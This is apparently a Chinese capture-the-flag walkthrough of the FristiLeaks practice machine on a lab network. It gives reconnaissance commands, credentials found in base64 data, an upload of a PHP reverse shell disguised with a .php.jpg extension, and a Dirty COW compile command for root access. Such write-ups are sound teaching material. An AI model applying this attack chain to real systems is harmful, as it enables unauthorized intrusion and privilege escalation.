靶机实战(fristileaks)

    技术2022-07-10  103

    fristileaks

    实验环境实验过程信息收集主机发现端口扫描服务扫描目录扫描 漏洞发现漏洞利用 总结

    实验环境

    靶机:fristileaks 测试机:kali(IP:192.168.186.128),win10

    实验过程

    信息收集

    主机发现

    netdiscover -i eth0 -r 192.168.186.0/24 nmap -sn 192.168.186.0/24 arp-scan -l ,arp-scan 192.168.186.0/24

    端口扫描

    masscan -p 0-65535 --rate=100000 192.168.186.142

    服务扫描

    nmap -sV -O -T4 192.168.186.142

    目录扫描

    主页面 有robots.txt 一定要看 发现类似用户名信息

    漏洞发现

    目录扫描没有什么结果,换个思路根据相关信息找到登录口/fristi/ 并且发现base64加密的信息和用户信息 Base64 解密是png图片数据导入1.png 应该是密码

    漏洞利用

    用户名eezeepz,密码keKkeKKeKKeKkEKKEK登录找到上传点 利用解析漏洞使用 Kali下的 webshell修改文件内容 后缀上传 直接访问http://192.168.186.146/fristi/uploads/php-reverse-shell.php.jpg拿到shell 脏牛提权: Python开启简易web服务python -m SimpleHTTPServer 8080下载 编译运行:

    gcc -pthread dirtcow.c -lcrypt -o a

    总结

    在目录扫描未扫到什么有用的信息时,网页的任何关键词都也有可能是一个页面 一些解析漏洞会将含有.php后缀的文件解析成php去运行。

    脏牛提权版本

    Processed: 0.008, SQL: 9